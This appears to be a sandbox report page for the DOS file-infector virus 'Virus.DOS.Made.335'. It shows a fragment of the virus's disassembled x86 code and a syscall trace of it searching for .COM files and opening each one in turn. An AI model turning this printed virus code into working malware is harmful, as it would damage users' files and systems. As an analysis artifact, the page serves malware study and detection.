Sample viewer

vx.netlux.org/Virus.DOS.Made.335

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:42:39.580258311Z 44 PC: 12a8d | Get time 0x12a8d: cmp word ptr [si + 0x11b], 0
0x12a92: je 0x12aa0
0x12a94: cmp word ptr [si + 0x11c], 0
0x12a99: je 0x12aa0
0x12a9b: cmp dh, 0xf
0x12a9e: jle 0x12aae
0x12aa0: cmp dl, 0
0x12aa3: je 0x12a89
0x12aa5: cmp dh, 0
0x12aa8: je 0x12a89
0x12aaa: mov word ptr [si + 0x11b], dx
0x12aae: mov bp, word ptr [si + 0x246]
0x12ab2: add bp, 0x103
0x12ab6: lea dx, word ptr [si + 0x248]
0x12aba: xor cx, cx
0x12abc: mov ah, 0x4e
0x12abe: int 0x21
0x12ac0: jb 0x12b3e
0x12ac2: mov ax, 0x3d02
0x12ac5: mov dx, 0x9e
2018-12-17T22:42:39.582666965Z 78 PC: 12ac0 | Find first file
2018-12-17T22:42:39.589472257Z 61 PC: 12aca | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:42:39.596394127Z 63 PC: 12b47 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:42:39.602946764Z 79 PC: 12ac0 | Find next file
2018-12-17T22:42:39.606480151Z 61 PC: 12aca | Open file (Filename = 'PRINT.COM')
2018-12-17T22:42:39.613952064Z 63 PC: 12b47 | Read file or device (Read 3 bytes on handle 6)
2018-12-17T22:42:39.620862824Z 79 PC: 12ac0 | Find next file
2018-12-17T22:42:39.625304236Z 61 PC: 12aca | Open file (Filename = 'HELLO.COM')
2018-12-17T22:42:39.632501774Z 63 PC: 12b47 | Read file or device (Read 3 bytes on handle 7)
2018-12-17T22:42:39.639248977Z 79 PC: 12ac0 | Find next file
2018-12-17T22:42:39.642907999Z 61 PC: 12aca | Open file (Filename = 'PHANG.COM')
2018-12-17T22:42:39.649630605Z 63 PC: 12b47 | Read file or device (Read 3 bytes on handle 8)
2018-12-17T22:42:39.656349615Z 79 PC: 12ac0 | Find next file
2018-12-17T22:42:39.660425981Z 61 PC: 12aca | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:42:39.667307114Z 63 PC: 12b47 | Read file or device (Read 3 bytes on handle 9)
2018-12-17T22:42:39.67378449Z 79 PC: 12ac0 | Find next file
2018-12-17T22:42:39.676466938Z 61 PC: 12aca | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:42:39.68328315Z 63 PC: 12b47 | Read file or device (Read 3 bytes on handle 10)
2018-12-17T22:42:39.690101927Z 79 PC: 12ac0 | Find next file
2018-12-17T22:42:39.69268539Z 61 PC: 12aca | Open file (Filename = 'PAH.COM')
2018-12-17T22:42:39.700143267Z 63 PC: 12b47 | Read file or device (Read 3 bytes on handle 11)
2018-12-17T22:42:39.706956624Z 79 PC: 12ac0 | Find next file
2018-12-17T22:42:39.709774096Z 61 PC: 12aca | Open file (Filename = 'TEST.COM')
2018-12-17T22:42:39.717228436Z 63 PC: 12b47 | Read file or device (Read 3 bytes on handle 12)
2018-12-17T22:42:39.719893041Z 66 PC: 12b47 | Move file pointer
2018-12-17T22:42:39.721457829Z 63 PC: 12b47 | Read file or device (Read 2 bytes on handle 12)
2018-12-17T22:42:39.724910324Z 79 PC: 12ac0 | Find next file